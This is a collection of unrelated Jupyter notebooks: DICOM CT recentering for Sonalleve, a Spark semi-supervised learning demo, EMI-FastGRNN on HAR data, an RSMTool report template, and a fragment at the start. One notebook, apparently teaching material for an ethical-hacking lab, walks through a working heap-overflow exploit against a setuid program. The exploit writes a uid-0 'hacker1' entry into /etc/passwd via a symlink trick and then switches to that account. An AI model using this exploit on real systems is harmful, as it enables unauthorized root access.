beta # or alternatively from natural parameters [eta1, eta2] log_partition = gammaln(alpha) - alpha * np.log(beta) ``` **Test by generating a plot** ``` plot_pdf(x=x, h=log_base_measure_func, T=T_func, eta=natural_parameters, A=log_partition, moment_pdf=gamma_pdf_func) ```
github_jupyter
# Notebook to recenter images of a DICOM dataset - CT scan version Use this notebook to navigate and select a location in the image to recenter a series of images. It loads a specific series and uses the notebook to select a location. This notebook shows an example of how to process a CT dataset. Some tricks need to be done to be sure it can be loaded into the Sonalleve treatment planning. **Very important, make a separate copy of this notebook for each transformation applied. That way the notebook is also the documentation of the transformation applied. This will be extremely useful for future analysis or for people reviewing the process** ** Also important. Operations are cumulative, meaning that you have to be careful to apply the desired translation/rotation only once.** If you need to start from scratch, simply re-execute from the cell with the code `A=SelectionMarkersUI(...` Do not forget to execute cells with "shift-Enter" ``` %matplotlib nbagg from __future__ import print_function from RecenterDicom import * import matplotlib.pyplot as plt ``` ## Select a directory that contains the DICOMDIR file of the exported dataset Assign the value to the ``base_dir`` variable. The code will print a list of all the series. Be sure you have inspected the dataset before with Osirix or any other DICOM viewer so you already have an idea of which dataset to select ``` base_dir = 'C:\Patient Data\Neuroblastoma\NB2\Patient Data CD2' PrintDicomDirSeries(base_dir) ``` ## Select a CT scan series by its UID Just copy the text of the UID above of the series you want to process. This is the best way to be sure you are loading the correct dataset. ## Select an MRI scan series that will be used as template We'll use an existing MRI dataset to grab any MRI DICOM file as template to do the "conversion" trick (Ari Partanen deserves the credit for this idea). 
This function will return only the filenames in the list MRIfiles. Alternatively, you could use a path to any other MRI dicom file (as long as it is a single slice) such as: `PathToMRIFile = "C:\\MyDicomFiles\\OneDataset\\A\\B\\C\\A3424.DCM"` or whatever #### OPTIONAL: Apply a rotation Many datasets are not necessarily showing a patient in the right orientation, especially for further analysis with the Sonalleve SW. If the dataset is required to be rotated, **DO IT BEFORE THE RECENTERING!!!!**. Uncomment and execute the code below if you need a rotation. For some datasets it rotates correctly, but for some others it rotates about a different axis. This still needs to be figured out, so for the moment a little trial and error will still be required to rotate the image as needed. Try a combination with axis either being 'RL', 'HF' or 'AP' ``` A=SelectionMarkersUI(base_dir,'1.2.528.1.1001.100.3.52861.3269.19990825110.20160420214120015') MRIfiles=ReadSpecificSeries(base_dir,'1.2.528.1.1001.100.3.2037.549.19990825110.20160420212840109',bReturnOnlyFileNames=True) #uncomment this line to apply a rotation, pick the desired value A.Rotation(180,axis='HF') ``` ## Use the interactive tool to select the slice number and the (x,y)-coordinates, in pixels, of the location you want to use as the place to recenter the dataset. By default the 3D visualization is off to help select the location faster. Once the location is identified, activating the 3D visualization will help to confirm its location in the MRI coordinate system. At this moment, the recentering hasn't yet been applied to the images. If you already know the location of slice, x-coordinate and y-coordinate (which may be the case when reprocessing), you can comment the call to `InteractiveSel()` and un-comment the `ShowData` function call where you specify the # slice and x- and y-coordinates directly. This may be handy to keep the changes documented. 
``` A.InteractiveSel() ``` ## "Execute" the offset to the dataset The location selected during navigation is now applied with the code below ``` A.ApplyOffset() ``` ## "Convert" to MRI DICOM **Very important**, some CT scans have one or more extra slices at the beginning to show location of the scans. For example: <img src="./Capture.PNG" width="300" height="300" /> This image needs to be removed from the dataset. To accomplish this, set a value in the parameter **`SkipImages`** in the function `ConvertCTtoMRI`. In this example, we skip only the first image. You can also notice we just use the first entry of the `MRIfiles` (we just need one). You can replace this by your own path. ### Important notes As usual when dealing with DICOM files, vendors love to do whatever they want with the standard and sometimes they do not provide all the metadata required to do the "conversion" trick. I have identified 3 fields that may be missing in the GE CT scans: ReconstructionDiameter, SpacingBetweenSlices and SlicePosition. So far, it seems easy to reconstruct them. If any other appears with another dataset, let me know. ### Adjusting the contrast The Sonalleve planning software has only limited control over adjusting the image contrast. If the CT data is copied natively, a lot of image regions appear hyperintense and clipped in intensity, which makes them difficult to navigate. The parameter `bAdjustContrastParam` activates the contrast adjustment to make it more readable. It is not 100% as good as a real DICOM viewer but it helps a lot to make it easier to visualize in the Sonalleve SW. The function `ConvertCTtoMRI` has the following extra parameters controlling the adjustment of contrast. Default values seem to produce reasonable results: * `lowhighin` (default [0,1]) is a two-value list that indicates the normalized range of the datatype dynamic to preserve from the input image. [0,1] means that values from 0 to 2^16-1 will be kept. 
It must have values from 0 to 1, and lowhighin[1]>lowhighin[0] * `lowhighout` (default [0,1]) is a two-value list that indicates the normalized range of the datatype dynamic to stretch the data into. [0,1] means that the input range will be stretched into values ranging from 0 to 2^16-1. * `gamma` (default 1.5) is the exponent coefficient used to adjust background luminosity. Values below 1 increase the luminosity. **This seems to be the best parameter to play around with**. Values larger than 1.5 seem to work nicely. **Very important** If using a `gamma` value greater than 1 the image may look "*completely*" dark on the Sonalleve. The opposite will happen with `gamma` less than 1 (a hyperintense image). Just adjust the brightness in the Sonalleve and the figure will appear correctly. ``` A.ConvertCTtoMRI(MRIfiles[0],SkipImages=1,bAdjustContrastParam=True,gamma=1.6) ``` ## Export the data Specify a directory where to export the data. If the directory does not exist, it will be created. Be sure to avoid directories with original data. Also, if you call this step again later, all images in the specified subdirectory will be overwritten. You can specify the flag 'bDeleteFilesFirst=True' to delete files in the target directory. This is useful if you are reusing the same directory over and over. If you end up exporting a dataset with fewer images than a previous export, it may cause problems in the Sonalleve. ``` A.ExportData('C:\Patient Data\ExportedForSonnalleve',bDeleteFilesFirst=True) ``` ## Use the data The exported data is conformant with DICOM viewers and the Sonalleve software. For the Sonalleve, start a standalone operation, input a body temperature. Modify the code below to match your Sonalleve directory, the location of dcmtk and the directory where you exported the data. Just run it with shift-Enter as usual and the images should be imported in the Sonalleve. Be sure the last line is correct to put back the current working directory in the notebook. 
``` import os curdir=os.getcwd() %cd "C:/Program Files (x86)/Philips Medical Systems/HIFU/3.2.740.2311" %run ./Scripts/DICOM/PlanningImageImporter.py -d "C:\Patient Data\ExportedForSonnalleve" -t "C:\dcmtk-3.6.0-win32-i386\bin" # DO NOT FORGET TO PUT BACK YOUR CURRENT DIRECTORY %cd "C:/Users/Charles/Desktop/ReCenterMRI" ```
github_jupyter
# Heap Overflow - buffer overflow can happen in other segments such as **heap**, **data** and **bss** - if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment) - controls may be limited ## Heap Overflow - heap overflow may not be as common as stack overflow but can be just as effective ### demos/heap_overflow/secret.cpp - review the program and spot the following line that's susceptible ```c++ strcpy(secret, argv[1]); // culprit! ``` ``` %cd demos/heap_overflow %pwd ! cat secret.cpp ! echo kali | sudo -S make ``` ### secret.exe must be setuid root program - all users in the system can keep their own secret by writing to /var/secrets file ``` ! ls -al secret.exe # run the program ! ./secret.exe # run the program with argument ! ./secret.exe "my top secret data" ! ./secret.exe "new note for user" ! echo kali | sudo -S cat /var/secret ``` ## overflowing buffer by corrupting datafile - how far down is secret_file from secret buffer (the offset)? - use gdb - subtract the address of secret buffer from the address of scret_file ```bash ┌──(kali㉿K)-[~/projects/EthicalHacking/demos/heap_overflow] └─$ sudo gdb -q ./secret.exe Reading symbols from ./secret.exe... (gdb) break main Breakpoint 1 at 0x804936a: file secret.cpp, line 21. (gdb) run "some secret" Starting program: /home/kali/projects/EthicalHacking/demos/heap_overflow/secret.exe "some secret" Breakpoint 1, main (argc=2, argv=0xffffd614) at secret.cpp:21 21 ofstream fout; (gdb) n (gdb) n (gdb) p/x secret # secret is a pointer $1 = 0x8051bb0 (gdb) p/x secret_file # secret file is a pointer $2 = 0x8051c20 (gdb) ``` ``` # the offset of secret_file from secret buffer is: print(0x8051c20 - 0x8051bb0) ! ./secret.exe $(python -c 'print("A"*112)') # let's make sure testfile doesn't exist in the current director # delete the file if exists #! rm -f testfile ! ls -al testfile ! 
./secret.exe $(python -c 'print("A"*112 + "testfile")') %%bash ls -al testfile %%bash echo kali | sudo -S cat testfile ``` ## Exploit the heap overflow flaw - several clever ways to exploit this type of capability - One interesting one: append a user account to the `/etc/passwd` file - make a backup copy of the file just incase... ``` %%bash cp /etc/passwd /tmp/passwd.bkup %%bash cat /tmp/passwd.bkup ``` ## /etc/passwd file format - Linux `/etc/passwd` file stores user account infor and hashed password using the following format: `username:password:userid:groupid:User Info:home folder:default shell` - x : hashed password stored in /etc/shadow file - NOTE: the password field can also contain hashed password - Python crypt module provides API to create Unix passwords with hash - [https://docs.python.org/3/library/crypt.html](https://docs.python.org/3/library/crypt.html) ```python crypt("password", "salt") ``` ``` %%bash python -c 'import crypt; print(crypt.crypt("password", "AA"))' %%bash python -c 'import crypt; print(crypt.crypt("password", "XX"))' ``` ## goal: generate a string that looks like `username:XXq2wKiyI43A2:0:0:userinfo:/root:/bin/bash` ### problem: - it's hard to generate the exact line ending with `/bin/bash` - because the file name `/etc/passwd` will be automatically attached at the end - remember we're writing the whole string as a secret note to the file ### workaround: - make `/etc/passwd` a soft link pointing to `/bin/bash` - create the following string instead: `username:XXq2wKiyI43A2:0:0:userinfo:/root:/tmp/etc/passwd` - Note `/etc/passwd` must be over_written to the `secret_file` buffer ``` %%bash mkdir /tmp/etc ln -s /bin/bash /tmp/etc/passwd %%bash ls -l /tmp/etc/passwd ``` ### now we can create a valid password entry that looks like: `hacker1:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd` #### things to note - the value just before `/etc/passwd` must be 112 bytes long, remember? 
- can play with user information column to adjust the length ``` %%bash # find the length with empty user info python -c 'print("hacker1:XXq2wKiyI43A2:0:0::/root:/tmp", end="")' %%bash # find the length with empty user info python -c 'print("hacker1:XXq2wKiyI43A2:0:0::/root:/tmp", end="")' | wc -c 112-37 %%bash python -c 'print("hacker1:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp", end="")' | wc -c ! ./secret.exe $(python -c 'print("hacker1:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp/etc/passwd", end="")') %%bash echo kali | sudo -S tail /etc/passwd ``` ## login or su - use newly created account (`hacker1:password`) to login ```bash ┌──(kali㉿K)-[~/projects/EthicalHacking/demos/heap_overflow] └─$ su hacker1 134 ⨯ Password: ┌──(root💀K)-[/home/kali/projects/EthicalHacking/demos/heap_overflow] └─# whomai ```
github_jupyter
<img src="https://upload.wikimedia.org/wikipedia/en/a/a1/Visma_logo.jpg" align="right" width="30%" alt="Visma logo"> Semi supervised learning (Still under development!) ============= <img src="http://www.rm.dk/siteassets/regional-udvikling/digitalisering/dabai/dabai-logo.png" align="right" width="20%" alt="DABAI logo"> The first set of methods cover the principles from the following summary: http://sci2s.ugr.es/ssl A batch-generative method, consisting of Kmeans and Logistic Regression, is implemented to cover a naive approach. This experiment is compared to a baseline which consists of only Logistic Regression. ``` %run -i initilization.py from pyspark.sql import functions as F from pyspark.ml import clustering from pyspark.ml import feature from pyspark.sql import DataFrame from pyspark.sql import Window from pyspark.ml import Pipeline from pyspark.ml import classification from pyspark.ml.evaluation import BinaryClassificationEvaluator from pyspark.ml.tuning import ParamGridBuilder, CrossValidator from shared import Plot2DGraphs, create_dummy_data from semisupervised import batch_generative_model ``` ##### Add some parameters in order to generate a dataset ``` mean_1 = [3.0, 3.0] std_1 = [2, 2] mean_2 = [-3.0, -3.0] std_2 = [1. , 1.0] n_1 = 300 n_2 = 300 n = [n_1, n_2] mean = [mean_1, mean_2] std = [std_1, std_2] ``` ### An initial method for semi-supervised learning The following cells are meant to provide a data creation method along with an initial attempt at a generative model for semi-supervised learning. 
``` def compute_error_rate(data_frame, truth_label='real_label', found_label='prediction'): """ """ df_stats = (data_frame .groupBy([truth_label, found_label]) .agg(F.count('prediction').alias('Prediction Count')) ) n = (df_stats .select(F.sum(F.col('Prediction Count')).alias('n')) .collect()[0]['n'] ) wrong_guess = (df_stats .filter((F.col(truth_label) != F.col(found_label))) .select(F.sum(F.col('Prediction Count')).alias('errors')) .collect()[0]['errors'] ) df_stats.show() print(n) print(wrong_guess) print('Error-rate: {}'.format(wrong_guess/n)) ``` ###### Create the labeled dataset, with 1% of the labels used and the rest set to NaN. ``` tester = create_dummy_data.create_labeled_data_with_clusters(n, mean, std, 0.01) df_tester = spark.createDataFrame(tester) ``` The dataset with labels and available labels plotted ``` Plot2DGraphs.plot_known_and_unknown_data(tester) ``` ###### The initial attempt at classifying the data, using logistic regression ``` df_train = df_tester.filter((F.col('used_label') != np.NaN)) df_test = df_tester.filter((F.col('used_label') == np.NaN)) vec_assembler = feature.VectorAssembler( inputCols=['x','y'], outputCol='features') lg = classification.LogisticRegression( featuresCol=vec_assembler.getOutputCol(), labelCol='used_label') pipeline = Pipeline(stages=[vec_assembler, lg]) # CrossValidation gets build here! 
param_grid = (ParamGridBuilder() .addGrid(lg.regParam, [0.1, 0.01]) .build() ) evaluator = BinaryClassificationEvaluator( rawPredictionCol=lg.getRawPredictionCol(), labelCol=lg.getLabelCol()) cross_validator = CrossValidator( estimator=pipeline, estimatorParamMaps=param_grid, evaluator=evaluator, numFolds=3) cross_validator_model = cross_validator.fit(df_train) df_without_semisupervised = cross_validator_model.transform(df_test) Plot2DGraphs.plot_known_and_unknown_data( df_without_semisupervised.toPandas(), labelCol='prediction') compute_error_rate(df_without_semisupervised) ``` ##### Let's take a look at the semi-supervised approach This simplified version uses KMeans and Logistic Regression. In the future, the obvious thing to do is either create a user-active system or use an ensemble approach ``` df_output = batch_generative_model.semi_supervised_batch_single_classifier_generate_approach(df_tester,['x','y']) df_output.limit(5).toPandas() compute_error_rate(df_output) Plot2DGraphs.plot_known_and_unknown_data(df_output.toPandas(), labelCol='prediction') df = spark.read.parquet('/home/svanhmic/workspace/data/DABAI/sparkdata/parquet/double_helix.parquet/') df.write.csv('/home/svanhmic/workspace/data/DABAI/sparkdata/csv/double_helix.csv/') ```
github_jupyter
# Using EMI-FastGRNN on the HAR Dataset This is a very simple example of how the existing EMI-FastGRNN implementation can be used on the HAR dataset. We illustrate how to train a model that predicts on 48 step sequence in place of the 128 length baselines while attempting to predict early. For more advanced use cases which involves more sophisticated computation graphs or loss functions, please refer to the doc strings provided with the released code. In the preprint of our work, we use the terms *bag* and *instance* to refer to the RNN input sequence of original length and the shorter ones we want to learn to predict on, respectively. In the code though, *bag* is replaced with *instance* and *instance* is replaced with *sub-instance*. We will use the term *instance* and *sub-instance* interchangeably. The network used here is a simple RNN + Linear classifier network. The UCI [Human Activity Recognition](https://archive.ics.uci.edu/ml/datasets/human+activity+recognition+using+smartphones) dataset. ``` from __future__ import print_function import os import sys import tensorflow as tf import numpy as np sys.path.insert(0, '../../') os.environ['CUDA_VISIBLE_DEVICES'] ='1' # FastGRNN and FastRNN imports from edgeml.graph.rnn import EMI_DataPipeline from edgeml.graph.rnn import EMI_FastGRNN from edgeml.graph.rnn import EMI_FastRNN from edgeml.trainer.emirnnTrainer import EMI_Trainer, EMI_Driver import edgeml.utils ``` Let us set up some network parameters for the computation graph. ``` # Network parameters for our FastGRNN + FC Layer NUM_HIDDEN = 16 NUM_TIMESTEPS = 48 NUM_FEATS = 9 FORGET_BIAS = 1.0 NUM_OUTPUT = 6 USE_DROPOUT = False KEEP_PROB = 0.9 # Non-linearities can be chosen among "tanh, sigmoid, relu, quantTanh, quantSigm" UPDATE_NL = "quantTanh" GATE_NL = "quantSigm" # Ranks of Parameter matrices for low-rank parameterisation to compress models. 
WRANK = 5 URANK = 6 # For dataset API PREFETCH_NUM = 5 BATCH_SIZE = 32 # Number of epochs in *one iteration* NUM_EPOCHS = 3 # Number of iterations in *one round*. After each iteration, # the model is dumped to disk. At the end of the current # round, the best model among all the dumped models in the # current round is picked up.. NUM_ITER = 4 # A round consists of multiple training iterations and a belief # update step using the best model from all of these iterations NUM_ROUNDS = 10 # A staging direcory to store models MODEL_PREFIX = '/tmp/models/model-fgrnn' ``` # Loading Data Please make sure the data is preprocessed to a format that is compatible with EMI-RNN. `tf/examples/EMI-RNN/fetch_har.py` can be used to download and setup the HAR dataset. ``` # Loading the data x_train, y_train = np.load('./HAR/48_16/x_train.npy'), np.load('./HAR/48_16/y_train.npy') x_test, y_test = np.load('./HAR/48_16/x_test.npy'), np.load('./HAR/48_16/y_test.npy') x_val, y_val = np.load('./HAR/48_16/x_val.npy'), np.load('./HAR/48_16/y_val.npy') # BAG_TEST, BAG_TRAIN, BAG_VAL represent bag_level labels. These are used for the label update # step of EMI/MI RNN BAG_TEST = np.argmax(y_test[:, 0, :], axis=1) BAG_TRAIN = np.argmax(y_train[:, 0, :], axis=1) BAG_VAL = np.argmax(y_val[:, 0, :], axis=1) NUM_SUBINSTANCE = x_train.shape[1] print("x_train shape is:", x_train.shape) print("y_train shape is:", y_train.shape) print("x_test shape is:", x_val.shape) print("y_test shape is:", y_val.shape) ``` # Computation Graph ![hell](img/3PartsGraph.png) The *EMI-RNN* computation graph is constructed out of the following three mutually disjoint parts ('modules'): 1. `EMI_DataPipeline`: An efficient data input pipeline that using the Tensorflow Dataset API. This module ingests data compatible with EMI-RNN and provides two iterators for a batch of input data, $x$ and label $y$. 2. `EMI_RNN`: The 'abstract' `EMI-RNN` class defines the methods and attributes required for the forward computation graph. 
An implementation based on FastGRNN - `EMI_FastGRNN` is used in this document, though the user is free to implement his own computation graphs compatible with `EMI-RNN`. This module expects two Dataset API iterators for $x$-batch and $y$-batch as inputs and constructs the forward computation graph based on them. Every implementation of this class defines an `output` operation - the output of the forward computation graph. 3. `EMI_Trainer`: An instance of `EMI_Trainer` class which defines the loss functions and the training routine. This expects an `output` operator from an `EMI-RNN` implementation and attaches loss functions and training routines to it. To build the computation graph, we create an instance of all the above and then connect them together. Note that, the `EMI_FastGRNN` class is an implementation that uses an FastGRNN cell and pushes the FastGRNN output at each step to a secondary classifier for classification. This secondary classifier is not implemented as part of `EMI_FastGRNN` and is left to the user to define by overriding the `createExtendedGraph` method, and the `restoreExtendedgraph` method. For the purpose of this example, we will be using a simple linear layer as a secondary classifier. 
``` # Define the linear secondary classifier def createExtendedGraph(self, baseOutput, *args, **kwargs): W1 = tf.Variable(np.random.normal(size=[NUM_HIDDEN, NUM_OUTPUT]).astype('float32'), name='W1') B1 = tf.Variable(np.random.normal(size=[NUM_OUTPUT]).astype('float32'), name='B1') y_cap = tf.add(tf.tensordot(baseOutput, W1, axes=1), B1, name='y_cap_tata') self.output = y_cap self.graphCreated = True def restoreExtendedGraph(self, graph, *args, **kwargs): y_cap = graph.get_tensor_by_name('y_cap_tata:0') self.output = y_cap self.graphCreated = True def feedDictFunc(self, keep_prob=None, inference=False, **kwargs): if inference is False: feedDict = {self._emiGraph.keep_prob: keep_prob} else: feedDict = {self._emiGraph.keep_prob: 1.0} return feedDict EMI_FastGRNN._createExtendedGraph = createExtendedGraph EMI_FastGRNN._restoreExtendedGraph = restoreExtendedGraph if USE_DROPOUT is True: EMI_FastGRNN.feedDictFunc = feedDictFunc inputPipeline = EMI_DataPipeline(NUM_SUBINSTANCE, NUM_TIMESTEPS, NUM_FEATS, NUM_OUTPUT) emiFastGRNN = EMI_FastGRNN(NUM_SUBINSTANCE, NUM_HIDDEN, NUM_TIMESTEPS, NUM_FEATS, wRank=WRANK, uRank=URANK, gate_non_linearity=GATE_NL, update_non_linearity=UPDATE_NL, useDropout=USE_DROPOUT) emiTrainer = EMI_Trainer(NUM_TIMESTEPS, NUM_OUTPUT, lossType='xentropy') ``` Now that we have all the elementary parts of the computation graph setup, we connect them together to form the forward graph. ``` tf.reset_default_graph() g1 = tf.Graph() with g1.as_default(): # Obtain the iterators to each batch of the data x_batch, y_batch = inputPipeline() # Create the forward computation graph based on the iterators y_cap = emiFastGRNN(x_batch) # Create loss graphs and training routines emiTrainer(y_cap, y_batch) ``` # EMI Driver The `EMI_Driver` implements the `EMI_RNN` algorithm. For more information on how the driver works, please refer to `tf/docs/EMI-RNN.md`. 
Note that, during the training period, the accuracy printed is instance level accuracy with the current label information as target. Bag level accuracy, with which we are actually concerned, is calculated after the training ends. ``` with g1.as_default(): emiDriver = EMI_Driver(inputPipeline, emiFastGRNN, emiTrainer) emiDriver.initializeSession(g1) y_updated, modelStats = emiDriver.run(numClasses=NUM_OUTPUT, x_train=x_train, y_train=y_train, bag_train=BAG_TRAIN, x_val=x_val, y_val=y_val, bag_val=BAG_VAL, numIter=NUM_ITER, keep_prob=KEEP_PROB, numRounds=NUM_ROUNDS, batchSize=BATCH_SIZE, numEpochs=NUM_EPOCHS, modelPrefix=MODEL_PREFIX, fracEMI=0.5, updatePolicy='top-k', k=1) ``` # Evaluating the trained model ![MIML Formulation illustration](img/MIML_illustration.png) ## Accuracy Since the trained model predicts on a smaller 48-step input while our test data has labels for 128 step inputs (i.e. bag level labels), evaluating the accuracy of the trained model is not straight forward. We perform the evaluation as follows: 1. Divide the test data also into sub-instances; similar to what was done for the train data. 2. Obtain sub-instance level predictions for each bag in the test data. 3. Obtain bag level predictions from sub-instance level predictions. For this, we use our estimate of the length of the signature to estimate the expected number of sub-instances that would be non negative - $k$ illustrated in the figure. If a bag has $k$ consecutive sub-instances with the same label, that becomes the label of the bag. All other bags are labeled negative. 4. Compare the predicted bag level labels with the known bag level labels in test data. ## Early Savings Early prediction is accomplished by defining an early prediction policy method. This method receives the prediction at each step of the learned FastGRNN for a sub-instance as input and is expected to return a predicted class and the 0-indexed step at which it made this prediction. This is illustrated below in code. 
``` # Early Prediction Policy: We make an early prediction based on the predicted classes # probability. If the predicted class probability > minProb at some step, we make # a prediction at that step. def earlyPolicy_minProb(instanceOut, minProb, **kwargs): assert instanceOut.ndim == 2 classes = np.argmax(instanceOut, axis=1) prob = np.max(instanceOut, axis=1) index = np.where(prob >= minProb)[0] if len(index) == 0: assert (len(instanceOut) - 1) == (len(classes) - 1) return classes[-1], len(instanceOut) - 1 index = index[0] return classes[index], index def getEarlySaving(predictionStep, numTimeSteps, returnTotal=False): predictionStep = predictionStep + 1 predictionStep = np.reshape(predictionStep, -1) totalSteps = np.sum(predictionStep) maxSteps = len(predictionStep) * numTimeSteps savings = 1.0 - (totalSteps / maxSteps) if returnTotal: return savings, totalSteps return savings k = 2 predictions, predictionStep = emiDriver.getInstancePredictions(x_test, y_test, earlyPolicy_minProb, minProb=0.99) bagPredictions = emiDriver.getBagPredictions(predictions, minSubsequenceLen=k, numClass=NUM_OUTPUT) print('Accuracy at k = %d: %f' % (k, np.mean((bagPredictions == BAG_TEST).astype(int)))) print('Additional savings: %f' % getEarlySaving(predictionStep, NUM_TIMESTEPS)) # A slightly more detailed analysis method is provided. df = emiDriver.analyseModel(predictions, BAG_TEST, NUM_SUBINSTANCE, NUM_OUTPUT) ``` ## Picking the best model The `EMI_Driver.run()` method, upon finishing, returns a list containing information about the best models after each EMI-RNN round. This can be used to identify the best model (based on validation accuracy) at the end of each round - illustrated below. 
``` devnull = open(os.devnull, 'r') for val in modelStats: round_, acc, modelPrefix, globalStep = val emiDriver.loadSavedGraphToNewSession(modelPrefix, globalStep, redirFile=devnull) predictions, predictionStep = emiDriver.getInstancePredictions(x_test, y_test, earlyPolicy_minProb, minProb=0.99, keep_prob=1.0) bagPredictions = emiDriver.getBagPredictions(predictions, minSubsequenceLen=k, numClass=NUM_OUTPUT) print("Round: %2d, Validation accuracy: %.4f" % (round_, acc), end='') print(', Test Accuracy (k = %d): %f, ' % (k, np.mean((bagPredictions == BAG_TEST).astype(int))), end='') print('Additional savings: %f' % getEarlySaving(predictionStep, NUM_TIMESTEPS)) ```
github_jupyter
``` # Setting options for the plots %matplotlib inline %config InlineBackend.figure_formats={'retina', 'svg'} %config InlineBackend.rc={'savefig.dpi': 150} ``` # Experiment Report ``` import itertools import math import os import re import pickle import platform import time import warnings from functools import partial from os.path import abspath, relpath, exists, join import numpy as np import pandas as pd import seaborn as sns import scipy.stats as stats import statsmodels.api as sm from matplotlib import pyplot as plt from textwrap import wrap # allow older versions of pandas to work try: from pandas.io.common import DtypeWarning except ImportError: from pandas.errors import DtypeWarning from IPython import sys_info from IPython.display import display, HTML, Image, Javascript, Markdown, SVG from rsmtool.reader import DataReader from rsmtool.writer import DataWriter from rsmtool.utils.files import parse_json_with_comments from rsmtool.utils.notebook import (float_format_func, int_or_float_format_func, compute_subgroup_plot_params, bold_highlighter, color_highlighter, show_thumbnail) from rsmtool.fairness_utils import (get_fairness_analyses, write_fairness_results) from rsmtool.version import VERSION as rsmtool_version sns.set_context('notebook') rsm_report_dir = os.environ.get('RSM_REPORT_DIR', None) if rsm_report_dir is None: rsm_report_dir = os.getcwd() rsm_environ_config = join(rsm_report_dir, '.environ.json') if not exists(rsm_environ_config): raise FileNotFoundError('The file {} cannot be located. 
' 'Please make sure that either (1) ' 'you have set the correct directory with the `RSM_REPORT_DIR` ' 'environment variable, or (2) that your `.environ.json` ' 'file is in the same directory as your notebook.'.format(rsm_environ_config)) environ_config = parse_json_with_comments(rsm_environ_config) ``` <style type="text/css"> div.prompt.output_prompt { color: white; } span.highlight_color { color: red; } span.highlight_bold { font-weight: bold; } @media print { @page { size: landscape; margin: 0cm 0cm 0cm 0cm; } * { margin: 0px; padding: 0px; } #toc { display: none; } span.highlight_color, span.highlight_bold { font-weight: bolder; text-decoration: underline; } div.prompt.output_prompt { display: none; } h3#Python-packages, div#packages { display: none; } </style> ``` # NOTE: you will need to set the following manually # if you are using this notebook interactively. experiment_id = environ_config.get('EXPERIMENT_ID') description = environ_config.get('DESCRIPTION') context = environ_config.get('CONTEXT') train_file_location = environ_config.get('TRAIN_FILE_LOCATION') test_file_location = environ_config.get('TEST_FILE_LOCATION') output_dir = environ_config.get('OUTPUT_DIR') figure_dir = environ_config.get('FIGURE_DIR') model_name = environ_config.get('MODEL_NAME') model_type = environ_config.get('MODEL_TYPE') skll_fixed_parameters = environ_config.get('SKLL_FIXED_PARAMETERS') skll_objective = environ_config.get('SKLL_OBJECTIVE') file_format = environ_config.get('FILE_FORMAT') length_column = environ_config.get('LENGTH_COLUMN') second_human_score_column = environ_config.get('H2_COLUMN') use_scaled_predictions = environ_config.get('SCALED') min_score = environ_config.get("MIN_SCORE") max_score = environ_config.get("MAX_SCORE") standardize_features = environ_config.get('STANDARDIZE_FEATURES') exclude_zero_scores = environ_config.get('EXCLUDE_ZEROS') feature_subset_file = environ_config.get('FEATURE_SUBSET_FILE', ' ') min_items = environ_config.get('MIN_ITEMS') 
use_thumbnails = environ_config.get('USE_THUMBNAILS') predict_expected_scores = environ_config.get('PREDICT_EXPECTED_SCORES') rater_error_variance = environ_config.get("RATER_ERROR_VARIANCE") # groups for analysis by prompt or subgroup. groups_desc = environ_config.get('GROUPS_FOR_DESCRIPTIVES') groups_eval = environ_config.get('GROUPS_FOR_EVALUATIONS') # min number of n for group to be displayed in the report min_n_per_group = environ_config.get('MIN_N_PER_GROUP') if min_n_per_group is None: min_n_per_group = {} # javascript path javascript_path = environ_config.get("JAVASCRIPT_PATH") # initialize counter for thumbnail IDs id_generator = itertools.count(1) with open(join(javascript_path, "sort.js"), "r", encoding="utf-8") as sortf: display(Javascript(data=sortf.read())) Markdown('''This report presents the analysis for **{}**: {}'''.format(experiment_id, description)) markdown_str = '' if use_thumbnails: markdown_str += ("""\n - Images in this report have been converted to """ """clickable thumbnails.""") if predict_expected_scores: markdown_str += ("""\n - Predictions analyzed in this report are *expected scores*, """ """i.e., probability-weighted averages over all score points.""") if markdown_str: markdown_str = '**Notes**:' + markdown_str display(Markdown(markdown_str)) HTML(time.strftime('%c')) %%html <div id="toc"></div> # Read in the training and testing features, both raw and pre-processed # Make sure that the `spkitemid` and `candidate` columns are read as strings # to preserve any leading zeros # We filter DtypeWarnings that pop up mostly in very large files string_columns = ['spkitemid', 'candidate'] converter_dict = {column: str for column in string_columns} with warnings.catch_warnings(): warnings.filterwarnings('ignore', category=DtypeWarning) if exists(train_file_location): df_train_orig = DataReader.read_from_file(train_file_location) train_file = join(output_dir, '{}_train_features.{}'.format(experiment_id, file_format)) if exists(train_file): 
df_train = DataReader.read_from_file(train_file, converters=converter_dict) train_metadata_file = join(output_dir, '{}_train_metadata.{}'.format(experiment_id, file_format)) if exists(train_metadata_file): df_train_metadata = DataReader.read_from_file(train_metadata_file, converters=converter_dict) train_other_columns_file = join(output_dir, '{}_train_other_columns.{}'.format(experiment_id, file_format)) if exists(train_other_columns_file): df_train_other_columns = DataReader.read_from_file(train_other_columns_file, converters=converter_dict) train_length_file = join(output_dir, '{}_train_response_lengths.{}'.format(experiment_id, file_format)) if exists(train_length_file): df_train_length = DataReader.read_from_file(train_length_file, converters=converter_dict) train_excluded_file = join(output_dir, '{}_train_excluded_responses.{}'.format(experiment_id, file_format)) if exists(train_excluded_file): df_train_excluded = DataReader.read_from_file(train_excluded_file, converters=converter_dict) train_responses_with_excluded_flags_file = join(output_dir, '{}_train_responses_with_excluded_flags.{}'.format(experiment_id, file_format)) if exists(train_responses_with_excluded_flags_file): df_train_responses_with_excluded_flags = DataReader.read_from_file(train_responses_with_excluded_flags_file, converters=converter_dict) train_preproc_file = join(output_dir, '{}_train_preprocessed_features.{}'.format(experiment_id, file_format)) if exists(train_preproc_file): df_train_preproc = DataReader.read_from_file(train_preproc_file, converters=converter_dict) if exists(test_file_location): df_test_orig = DataReader.read_from_file(test_file_location) test_file = join(output_dir, '{}_test_features.{}'.format(experiment_id, file_format)) if exists(test_file): df_test = DataReader.read_from_file(test_file, converters=converter_dict) test_metadata_file = join(output_dir, '{}_test_metadata.{}'.format(experiment_id, file_format)) if exists(test_metadata_file): df_test_metadata = 
